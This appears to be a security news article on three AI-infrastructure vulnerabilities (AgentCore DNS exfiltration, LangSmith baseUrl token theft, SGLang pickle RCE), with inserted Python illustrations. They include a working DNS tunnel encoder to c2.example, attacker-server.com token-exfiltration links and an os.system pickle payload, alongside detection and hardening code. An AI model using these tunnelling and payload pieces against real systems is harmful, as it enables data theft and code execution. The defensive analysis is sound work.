
Cybersecurity researchers have detailed a new method for extracting sensitive data from artificial intelligence (AI) code execution environments using Domain Name System (DNS) queries.
In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode allows outbound DNS queries, which an attacker can abuse to establish an interactive shell and bypass the sandbox’s network isolation. The issue has no CVE identifier but has been assigned a CVSS score of 7.5 out of 10.0.
Amazon Bedrock AgentCore Code Interpreter is a fully managed service that lets AI agents run code in an isolated sandbox so that agent workloads cannot reach external systems. Amazon released the service in August 2025.
Kinnaird McQuaid, chief security architect at BeyondTrust, said the fact that the service allows DNS queries despite its “no network access” configuration could allow “in certain scenarios a threat actor to establish a command and control channel and circumvent expected network isolation controls to exfiltrate data via DNS.”
In an experimental attack scenario, an attacker can abuse this behaviour to turn DNS queries and responses into a two-way communication channel, obtain an interactive reverse shell, and carry sensitive information out in DNS queries, provided the code they run in the interpreter can reach AWS resources through the interpreter’s IAM role, such as an S3 bucket that stores sensitive data.
Additionally, the same DNS channel could be used to deliver further payloads to the code interpreter, which could poll an attacker’s DNS command-and-control (C2) server, execute commands encoded in DNS A records, and return the results via DNS subdomain queries.
Note that the code interpreter requires an IAM role to access AWS resources. However, a simple oversight can leave the service with an over-privileged role that grants broad access to sensitive data.
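The two directions of the channel described above, reduced to their encoding, plus the detection heuristic a defender would run over resolver query logs. This is an added illustration, not BeyondTrust’s code: the zone c2.example, the label layout (a hex sequence number, up to three base32 labels, a session label) and the sample secret are assumptions or constructed data, and the credentials in it are the placeholder values from AWS documentation, not real keys.

```python
"""DNS tunnelling of the kind described above, and one detection heuristic.

Added illustration, not BeyondTrust's code. ZONE, the label layout and the
sample data are assumptions / constructed; the credentials are the fake
placeholders used in AWS documentation.
"""
from __future__ import annotations

import base64
import math
from collections import Counter, defaultdict

ZONE = "c2.example"  # assumed attacker-controlled zone (anything the sandbox resolver will look up)
MAX_LABEL = 63       # RFC 1035 label limit
MAX_NAME = 253       # RFC 1035 name limit


def encode_exfil(data: bytes, session: str = "s1", labels_per_name: int = 3) -> list[str]:
    """Sandbox side: split data into query names <seq>.<b32>...<b32>.<session>.ZONE.
    Each lookup leaks up to labels_per_name*63 base32 characters (~118 bytes)."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()  # DNS is case-insensitive
    per_name = MAX_LABEL * labels_per_name
    names = []
    for seq, start in enumerate(range(0, len(b32), per_name)):
        chunk = b32[start:start + per_name]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{seq:x}", *labels, session, ZONE])
        if len(name) > MAX_NAME:
            raise ValueError("name exceeds 253 octets; lower labels_per_name")
        names.append(name)
    return names


def decode_exfil(names: list[str], session: str = "s1") -> bytes:
    """Attacker's authoritative server: reassemble from the queries it saw, in any order."""
    suffix = f".{session}.{ZONE}"
    chunks: dict[int, str] = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        seq, *labels = name[: -len(suffix)].split(".")
        chunks[int(seq, 16)] = "".join(labels)
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))  # restore the stripped padding


def command_to_a_records(cmd: str) -> list[str]:
    """C2 side: pack a command into A-record octets, four bytes per answer."""
    raw = cmd.encode()
    raw += b"\x00" * (-len(raw) % 4)
    return [".".join(str(b) for b in raw[i:i + 4]) for i in range(0, len(raw), 4)]


def a_records_to_command(records: list[str]) -> str:
    """Sandbox side: the 'IP addresses' in the answer are the next command to run."""
    raw = bytes(int(o) for r in records for o in r.split("."))
    return raw.rstrip(b"\x00").decode()


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character; base32 payload labels sit near 4-5."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def flag_tunnel_suspects(queries: list[str], min_unique: int = 20, min_len: int = 40,
                         min_entropy: float = 3.0) -> dict[str, dict]:
    """Defender side (e.g. over Route 53 Resolver query logs): group queries by their
    last two labels and flag domains that receive many distinct, long, high-entropy
    subdomains. The thresholds are starting points to tune against your own traffic."""
    subs_by_domain: dict[str, set[str]] = defaultdict(set)
    for q in queries:
        labels = q.lower().rstrip(".").split(".")
        if len(labels) >= 3:
            subs_by_domain[".".join(labels[-2:])].add(".".join(labels[:-2]))
    report = {}
    for domain, subs in subs_by_domain.items():
        long_labels = [lab for s in subs for lab in s.split(".") if len(lab) >= min_len]
        if len(subs) < min_unique or not long_labels:
            continue
        avg = sum(map(label_entropy, long_labels)) / len(long_labels)
        if avg >= min_entropy:
            report[domain] = {"unique_subdomains": len(subs), "avg_label_entropy": round(avg, 2)}
    return report


# Constructed sample data; the credentials are AWS documentation placeholders, not real keys.
SAMPLE_SECRET = (b"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
                 b"aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n") * 30
BENIGN_QUERIES = ["www.example.com", "api.github.com", "cdn.example.net"] * 50


def demo() -> dict[str, dict]:
    """Mix the tunnel traffic into benign lookups and run the heuristic over the lot."""
    return flag_tunnel_suspects(BENIGN_QUERIES + encode_exfil(SAMPLE_SECRET))


if __name__ == "__main__":
    print(demo())
```

The heuristic is deliberately simple: a real tunnel would encrypt and pad the payload, and could use TXT or NULL records for the downstream side, so in practice pair it with query volume per domain and the NXDOMAIN ratio. On AWS the input would be Route 53 Resolver query logs, and a Route 53 Resolver DNS Firewall rule that blocks everything outside an allowlist is what stops the channel rather than just spotting it.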
“This research shows how DNS resolution can undermine network isolation guarantees for sandboxed code interpreters,” BeyondTrust said. “Using this method, an attacker could exfiltrate sensitive data from AWS resources accessible through the Code Interpreter IAM role, potentially causing downtime, data breach of sensitive customer information, or infrastructure removal.”

Following responsible disclosure in September 2025, Amazon determined that this was intended behaviour rather than a flaw and encouraged customers who need full network isolation to use VPC mode rather than sandbox mode. The company also recommends using a DNS firewall to filter outbound DNS traffic.

“To protect sensitive workloads, administrators should inventory all active AgentCore code interpreter instances and immediately migrate instances processing sensitive data from sandbox mode to VPC mode,” said Jason Soroko, senior fellow at Sectigo.
“Operating within a VPC provides the necessary infrastructure for robust network isolation and allows teams to implement strict security groups, network ACLs, and Route 53 Resolver DNS firewalls to monitor and block unauthorized DNS resolutions. Finally, security teams should rigorously audit the IAM roles associated with these interpreters and strictly enforce the principle of least privilege to limit the scope of a potential breach.”
LangSmith is affected by account takeover vulnerability
This disclosure comes after Miggo Security detailed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposes users to token theft and account takeover. The issue affects both self-hosted and cloud deployments and is resolved in LangSmith version 0.12.71, released in December 2025.
The flaw, characterized as a URL parameter injection caused by missing validation of the baseUrl parameter, allows an attacker to exfiltrate a signed-in user’s bearer token, user ID, and workspace ID to a server under their control. The victim only has to be tricked, through social engineering, into clicking a specially crafted link such as the ones below.
Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
Self-hosted: /studio/?baseUrl=https://attacker-server.com
Successful exploitation could give an attacker unauthorized access to the victim’s AI trace history, and through the recorded tool calls expose internal SQL queries, CRM customer records, or proprietary source code.
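The pattern behind the flaw, in miniature: a page reads an API base URL from the query string and sends the session’s bearer token there, so whoever controls the parameter controls the destination. Below, an added example (not LangSmith’s code, and not how the project fixed it) shows the unvalidated handling next to one hardened form that compares the parsed origin against an allowlist. The default API origin, the allowlist, the header names and the session values are assumptions or constructed data. Note that Python’s urlsplit is not the browser’s URL parser; the point is the origin comparison, which applies either side.

```python
"""baseUrl handling: trusting the parameter as-is versus allowlisting its origin.

Added illustration, not LangSmith's code. DEFAULT_API, ALLOWED_API_ORIGINS, the
header names and SESSION are assumptions / constructed values.
"""
from __future__ import annotations

from urllib.parse import parse_qs, urlsplit

DEFAULT_API = "https://api.smith.langchain.com"                      # assumed
ALLOWED_API_ORIGINS = {DEFAULT_API, "https://eu.api.smith.langchain.com"}  # assumed allowlist
SESSION = {"token": "Bearer eyJ.constructed.token", "user_id": "u_123", "workspace_id": "ws_456"}


def base_url_param(page_url: str) -> str | None:
    """Extract ?baseUrl=... from the studio page URL (first value only)."""
    return parse_qs(urlsplit(page_url).query).get("baseUrl", [None])[0]


def _auth_headers() -> dict:
    return {"Authorization": SESSION["token"],
            "X-User-Id": SESSION["user_id"],
            "X-Workspace-Id": SESSION["workspace_id"]}


def build_request_vulnerable(page_url: str) -> dict:
    """Before: the parameter is trusted, so the credentials go wherever it points."""
    base = base_url_param(page_url) or DEFAULT_API
    return {"url": base.rstrip("/") + "/info", "headers": _auth_headers()}


def validate_base_url(candidate: str | None) -> str:
    """After: accept only an https URL whose origin (scheme, host, port) is allowlisted.
    Userinfo (user@host tricks), lookalike hosts, scheme-relative URLs, odd ports
    and non-https schemes all fall back to the default."""
    if not candidate:
        return DEFAULT_API
    parts = urlsplit(candidate)
    try:
        port = parts.port  # raises ValueError for a non-numeric or out-of-range port
    except ValueError:
        return DEFAULT_API
    if (parts.scheme != "https" or not parts.hostname
            or parts.username is not None or parts.password is not None):
        return DEFAULT_API
    origin = f"https://{parts.hostname}" + (f":{port}" if port not in (None, 443) else "")
    return origin if origin in ALLOWED_API_ORIGINS else DEFAULT_API


def build_request_hardened(page_url: str) -> dict:
    """Same request, but the destination is the validated origin, never the raw parameter."""
    base = validate_base_url(base_url_param(page_url))
    return {"url": base + "/info", "headers": _auth_headers()}


def request_host(req: dict) -> str | None:
    """Where the credentials would actually be sent."""
    return urlsplit(req["url"]).hostname


if __name__ == "__main__":
    evil = "https://smith.langchain.com/studio/?baseUrl=https://attacker-server.com"
    print("vulnerable sends token to:", request_host(build_request_vulnerable(evil)))
    print("hardened sends token to:  ", request_host(build_request_hardened(evil)))
```

The safest variant is not to take a server address from the URL at all; where a deployment really needs it (self-hosted instances pointing at their own API), an exact-origin allowlist is the check, not a prefix or substring match on the string.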
“Logged-in LangSmith users could be compromised simply by visiting an attacker-controlled site or clicking on a malicious link,” said Miggo researchers Liad Eliyahu and Eliana Vuijsje.

“This vulnerability is a reminder that AI observability platforms are now critical infrastructure. These tools often inadvertently bypass security guardrails in favor of developer flexibility. This risk is further exacerbated because, like ‘traditional’ software, AI agents have deep access to internal data sources and third-party services.”
Insecure Pickle deserialization flaw in SGLang
Security vulnerabilities have also been reported in SGLang, a popular open-source framework for serving large language and multimodal models, that stem from insecure pickle deserialization and, if successfully exploited, could lead to remote code execution.
The vulnerabilities, discovered by Orca Security researcher Igor Stepansky, had not been patched at the time of writing. A brief description of each follows:
CVE-2026-3059 (CVSS score: 9.8) – Unauthenticated remote code execution via the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data with pickle.loads() without authentication. This affects SGLang’s multimodal generation module.
CVE-2026-3060 (CVSS score: 9.8) – Unauthenticated remote code execution in a separate module that likewise uses pickle.loads() without authentication to deserialize untrusted data. This affects SGLang’s encoder parallel decomposition system.
CVE-2026-3989 (CVSS score: 7.8) – SGLang’s “replay_request_dump.py” calls pickle.load() on a supplied file without validation, which can be exploited by providing a malicious pickle file.
“The first two allow unauthenticated remote code execution for SGLang deployments that expose multimodal generation and decomposition functionality to the network,” Stepansky said. “The third one involves unsafe deserialization in the crash dump replay utility.”
The CERT Coordination Center (CERT/CC) stated in a coordinated advisory that SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled and to CVE-2026-3060 when the encoder parallel decomposition system is enabled.
“If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and is able to send requests to the server, the vulnerability could be exploited by sending a malicious pickle file to the broker and deserializing it,” the CERT/CC states.
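Why a pickle.loads() call on a network socket is remote code execution, and the two checks a service in this position can apply while it moves to a data-only format. This is an added illustration, not SGLang’s code: the message contents and the shell command are constructed, and the opcode triage and allowlisting unpickler are general techniques, not the project’s fix.

```python
"""pickle.loads() on untrusted input, the payload shape, and two defensive checks.

Added illustration, not SGLang's code. The broker message contents and the
command in the payload are constructed.
"""
from __future__ import annotations

import io
import os
import pickle
import pickletools


class Exploit:
    """pickle does not store this object's fields; it stores 'call os.system(cmd)'.
    dumps() only writes bytes, the command runs on whoever calls loads()."""

    def __init__(self, cmd: str):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def build_malicious_message(cmd: str = "id > /tmp/pwned") -> bytes:
    """What an attacker would send to an exposed broker port (bytes only, nothing runs here)."""
    return pickle.dumps(Exploit(cmd))


def build_benign_message() -> bytes:
    """Shape of a plausible broker message: plain containers and scalars, no classes."""
    return pickle.dumps({"rid": "req-1", "modality": "image", "embedding_shape": [1, 768]})


# Check 1: static triage. pickletools.genops parses the opcode stream without executing
# it, so a listener or an IDS can spot the opcodes that import or call code before load.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def dangerous_opcodes(data: bytes) -> list[str]:
    return sorted({op.name for op, _arg, _pos in pickletools.genops(data) if op.name in CODE_OPCODES})


# Check 2: runtime allowlist. Unpickler.find_class is the only route by which a pickle
# reaches a callable; refusing everything not explicitly approved closes that route.
class RestrictedUnpickler(pickle.Unpickler):
    ALLOWED: set[tuple[str, str]] = set()  # add (module, name) pairs deliberately, if ever

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(data: bytes) -> tuple[bool, object]:
    """(True, obj) for plain data; (False, reason) for anything that tries to load code."""
    try:
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


if __name__ == "__main__":
    evil = build_malicious_message()
    print("opcodes:", dangerous_opcodes(evil))      # e.g. ['REDUCE', 'STACK_GLOBAL']
    print("safe_loads:", safe_loads(evil))          # (False, 'forbidden global ...')
    print("benign:", safe_loads(build_benign_message()))
    # pickle.loads(evil) would run the command; never do that outside a throwaway VM.
```

Both checks are mitigations, not the fix: the opcode scan can be evaded by an attacker who studies the allowlist, and an allowlisting unpickler is only as safe as the names it admits. The durable remedy is a format that cannot carry code (JSON, msgpack, or fixed-layout tensors) plus authentication on the ZeroMQ endpoint, which ZeroMQ supports natively through its CURVE mechanism, alongside the network restrictions recommended below.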
Users of SGLang are advised to restrict access to the service interface and keep it off untrusted networks, and to implement network segmentation and access controls that prevent unauthorized interactions with ZeroMQ endpoints.
Although there is no evidence that these vulnerabilities have been exploited, defenders should monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the SGLang Python process, file creation in unusual locations by that process, and outbound connections from it to unexpected destinations.
